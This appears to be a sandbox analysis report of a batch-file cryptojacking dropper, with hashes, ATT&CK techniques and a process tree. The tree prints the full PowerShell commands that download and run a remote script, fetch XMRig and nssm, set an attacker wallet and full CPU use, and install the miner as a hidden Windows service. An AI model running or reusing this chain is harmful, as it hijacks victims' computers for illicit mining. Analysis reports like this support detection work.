xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
150s
max time network
83s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01-07-2024 03:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

293392613821223.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 17 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\moneroocean\xmrig.exe	family_xmrig
C:\Users\Admin\moneroocean\xmrig.exe	xmrig
behavioral1/memory/1288-135-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-426-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-427-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-428-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-429-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-430-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-431-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-432-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-433-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-434-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-435-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-436-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-437-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2600-438-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

2 3620 powershell.exe
5 5020 powershell.exe
7 1980 powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 9 IoCs

Processes:

xmrig.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exexmrig.exe

pid process

1288 xmrig.exe
1840 nssm.exe
4688 nssm.exe
1612 nssm.exe
4940 nssm.exe
4252 nssm.exe
4848 nssm.exe
4644 nssm.exe
2600 xmrig.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
5 raw.githubusercontent.com
7 raw.githubusercontent.com
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3776 sc.exe
5056 sc.exe
2296 sc.exe
492 sc.exe

flow	pid	process
2	3620	powershell.exe
5	5020	powershell.exe
7	1980	powershell.exe

pid	process
1288	xmrig.exe
1840	nssm.exe
4688	nssm.exe
1612	nssm.exe
4940	nssm.exe
4252	nssm.exe
4848	nssm.exe
4644	nssm.exe
2600	xmrig.exe

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
7	raw.githubusercontent.com

pid	process
3776	sc.exe
5056	sc.exe
2296	sc.exe
492	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
628	powershell.exe
508	powershell.exe
2176	powershell.exe
1980	powershell.exe
3620	powershell.exe
2744	powershell.exe
376	powershell.exe
4048	powershell.exe
3776	powershell.exe
4884	powershell.exe
4652	powershell.exe
1924	powershell.exe
5020	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
1832	timeout.exe
4876	timeout.exe
1084	timeout.exe
5076	timeout.exe
4468	timeout.exe
3936	timeout.exe
496	timeout.exe
2308	timeout.exe
4684	timeout.exe
3972	timeout.exe
4484	timeout.exe
1360	timeout.exe
5044	timeout.exe
956	timeout.exe
5072	timeout.exe
4108	timeout.exe
2744	timeout.exe
1832	timeout.exe
3768	timeout.exe
1432	timeout.exe
3984	timeout.exe
2840	timeout.exe
1336	timeout.exe
2856	timeout.exe
4136	timeout.exe
1824	timeout.exe
4200	timeout.exe
4400	timeout.exe
4992	timeout.exe
2836	timeout.exe
4108	timeout.exe
1672	timeout.exe
4320	timeout.exe
732	timeout.exe
4496	timeout.exe
3888	timeout.exe
4564	timeout.exe
376	timeout.exe
1548	timeout.exe
1532	timeout.exe
2752	timeout.exe
2796	timeout.exe
3684	timeout.exe
4676	timeout.exe
1464	timeout.exe
3304	timeout.exe
712	timeout.exe
4528	timeout.exe
5000	timeout.exe
4880	timeout.exe
2892	timeout.exe
3824	timeout.exe
2944	timeout.exe
908	timeout.exe
3076	timeout.exe
5028	timeout.exe
4348	timeout.exe
4008	timeout.exe
2176	timeout.exe
1784	timeout.exe
3276	timeout.exe
3880	timeout.exe
4260	timeout.exe
2888	timeout.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2600 taskkill.exe
Runs net.exe

pid	process
2600	taskkill.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3620	powershell.exe
3620	powershell.exe
3620	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
508	powershell.exe
508	powershell.exe
508	powershell.exe
4884	powershell.exe
4884	powershell.exe
4884	powershell.exe
4652	powershell.exe
4652	powershell.exe
4652	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
1924	powershell.exe
1924	powershell.exe
1924	powershell.exe
3776	powershell.exe
3776	powershell.exe
3776	powershell.exe
2744	powershell.exe
2744	powershell.exe
2744	powershell.exe
628	powershell.exe
628	powershell.exe
628	powershell.exe
376	powershell.exe
376	powershell.exe
376	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
4048	powershell.exe
4048	powershell.exe
4048	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexmrig.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	2600	taskkill.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	508	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	3776	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	376	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeLockMemoryPrivilege	2600	xmrig.exe
Token: SeIncreaseQuotaPrivilege	3488	WMIC.exe
Token: SeSecurityPrivilege	3488	WMIC.exe
Token: SeTakeOwnershipPrivilege	3488	WMIC.exe
Token: SeLoadDriverPrivilege	3488	WMIC.exe
Token: SeSystemProfilePrivilege	3488	WMIC.exe
Token: SeSystemtimePrivilege	3488	WMIC.exe
Token: SeProfSingleProcessPrivilege	3488	WMIC.exe
Token: SeIncBasePriorityPrivilege	3488	WMIC.exe
Token: SeCreatePagefilePrivilege	3488	WMIC.exe
Token: SeBackupPrivilege	3488	WMIC.exe
Token: SeRestorePrivilege	3488	WMIC.exe
Token: SeShutdownPrivilege	3488	WMIC.exe
Token: SeDebugPrivilege	3488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3488	WMIC.exe
Token: SeRemoteShutdownPrivilege	3488	WMIC.exe
Token: SeUndockPrivilege	3488	WMIC.exe
Token: SeManageVolumePrivilege	3488	WMIC.exe
Token: 33	3488	WMIC.exe
Token: 34	3488	WMIC.exe
Token: 35	3488	WMIC.exe
Token: 36	3488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3488	WMIC.exe
Token: SeSecurityPrivilege	3488	WMIC.exe
Token: SeTakeOwnershipPrivilege	3488	WMIC.exe
Token: SeLoadDriverPrivilege	3488	WMIC.exe
Token: SeSystemProfilePrivilege	3488	WMIC.exe
Token: SeSystemtimePrivilege	3488	WMIC.exe
Token: SeProfSingleProcessPrivilege	3488	WMIC.exe
Token: SeIncBasePriorityPrivilege	3488	WMIC.exe
Token: SeCreatePagefilePrivilege	3488	WMIC.exe
Token: SeBackupPrivilege	3488	WMIC.exe
Token: SeRestorePrivilege	3488	WMIC.exe
Token: SeShutdownPrivilege	3488	WMIC.exe
Token: SeDebugPrivilege	3488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3488	WMIC.exe
Token: SeRemoteShutdownPrivilege	3488	WMIC.exe
Token: SeUndockPrivilege	3488	WMIC.exe
Token: SeManageVolumePrivilege	3488	WMIC.exe
Token: 33	3488	WMIC.exe
Token: 34	3488	WMIC.exe
Token: 35	3488	WMIC.exe
Token: 36	3488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2308	WMIC.exe
Token: SeSecurityPrivilege	2308	WMIC.exe
Token: SeTakeOwnershipPrivilege	2308	WMIC.exe
Token: SeLoadDriverPrivilege	2308	WMIC.exe
Token: SeSystemProfilePrivilege	2308	WMIC.exe
Token: SeSystemtimePrivilege	2308	WMIC.exe
Token: SeProfSingleProcessPrivilege	2308	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

xmrig.exe

pid process

2600 xmrig.exe

pid	process
2600	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execmd.exenet.execmd.exepowershell.exe

description	pid	process	target process
PID 4864 wrote to memory of 3620	4864	cmd.exe	powershell.exe
PID 4864 wrote to memory of 3620	4864	cmd.exe	powershell.exe
PID 3620 wrote to memory of 4368	3620	powershell.exe	cmd.exe
PID 3620 wrote to memory of 4368	3620	powershell.exe	cmd.exe
PID 4368 wrote to memory of 4592	4368	cmd.exe	net.exe
PID 4368 wrote to memory of 4592	4368	cmd.exe	net.exe
PID 4592 wrote to memory of 2152	4592	net.exe	net1.exe
PID 4592 wrote to memory of 2152	4592	net.exe	net1.exe
PID 4368 wrote to memory of 4512	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 4512	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 4484	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 4484	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 4440	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 4440	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 4272	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 4272	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 644	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 644	4368	cmd.exe	where.exe
PID 4368 wrote to memory of 3776	4368	cmd.exe	sc.exe
PID 4368 wrote to memory of 3776	4368	cmd.exe	sc.exe
PID 4368 wrote to memory of 5056	4368	cmd.exe	sc.exe
PID 4368 wrote to memory of 5056	4368	cmd.exe	sc.exe
PID 4368 wrote to memory of 2600	4368	cmd.exe	taskkill.exe
PID 4368 wrote to memory of 2600	4368	cmd.exe	taskkill.exe
PID 4368 wrote to memory of 5020	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 5020	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 508	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 508	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 4884	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 4884	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 1288	4368	cmd.exe	xmrig.exe
PID 4368 wrote to memory of 1288	4368	cmd.exe	xmrig.exe
PID 4368 wrote to memory of 4648	4368	cmd.exe	cmd.exe
PID 4368 wrote to memory of 4648	4368	cmd.exe	cmd.exe
PID 4648 wrote to memory of 4652	4648	cmd.exe	powershell.exe
PID 4648 wrote to memory of 4652	4648	cmd.exe	powershell.exe
PID 4652 wrote to memory of 4608	4652	powershell.exe	HOSTNAME.EXE
PID 4652 wrote to memory of 4608	4652	powershell.exe	HOSTNAME.EXE
PID 4368 wrote to memory of 2176	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 2176	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 1924	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 1924	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 3776	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 3776	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 2744	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 2744	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 628	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 628	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 376	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 376	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 1980	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 1980	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 4048	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 4048	4368	cmd.exe	powershell.exe
PID 4368 wrote to memory of 2296	4368	cmd.exe	sc.exe
PID 4368 wrote to memory of 2296	4368	cmd.exe	sc.exe
PID 4368 wrote to memory of 492	4368	cmd.exe	sc.exe
PID 4368 wrote to memory of 492	4368	cmd.exe	sc.exe
PID 4368 wrote to memory of 1840	4368	cmd.exe	nssm.exe
PID 4368 wrote to memory of 1840	4368	cmd.exe	nssm.exe
PID 4368 wrote to memory of 4688	4368	cmd.exe	nssm.exe
PID 4368 wrote to memory of 4688	4368	cmd.exe	nssm.exe
PID 4368 wrote to memory of 1612	4368	cmd.exe	nssm.exe
PID 4368 wrote to memory of 1612	4368	cmd.exe	nssm.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\293392613821223.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp71A6.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
3⤵
- Suspicious use of WriteProcessMemory
PID:4368

C:\Windows\system32\net.exe
net session
4⤵
- Suspicious use of WriteProcessMemory
PID:4592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
5⤵
PID:2152

C:\Windows\system32\where.exe
where powershell
4⤵
PID:4512

C:\Windows\system32\where.exe
where find
4⤵
PID:4484

C:\Windows\system32\where.exe
where findstr
4⤵
PID:4440

C:\Windows\system32\where.exe
where tasklist
4⤵
PID:4272

C:\Windows\system32\where.exe
where sc
4⤵
PID:644

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:3776

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:5056

C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884

C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
4⤵
- Executes dropped EXE
PID:1288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
4⤵
- Suspicious use of WriteProcessMemory
PID:4648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4652

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
6⤵
PID:4608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ybqdfvlh\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:2296

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:492

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
4⤵
- Executes dropped EXE
PID:1840

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
4⤵
- Executes dropped EXE
PID:4688

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
4⤵
- Executes dropped EXE
PID:1612

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
4⤵
- Executes dropped EXE
PID:4940

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
4⤵
- Executes dropped EXE
PID:4252

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
4⤵
- Executes dropped EXE
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4320

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1320

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3284

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4100

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2888

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2260

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4684

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1512

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4028

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1084

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4312

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3972

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3912

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3532

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2148

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5000

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3484

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1948

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4072

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1372

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3796

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4292

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4388

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4380

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4004

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
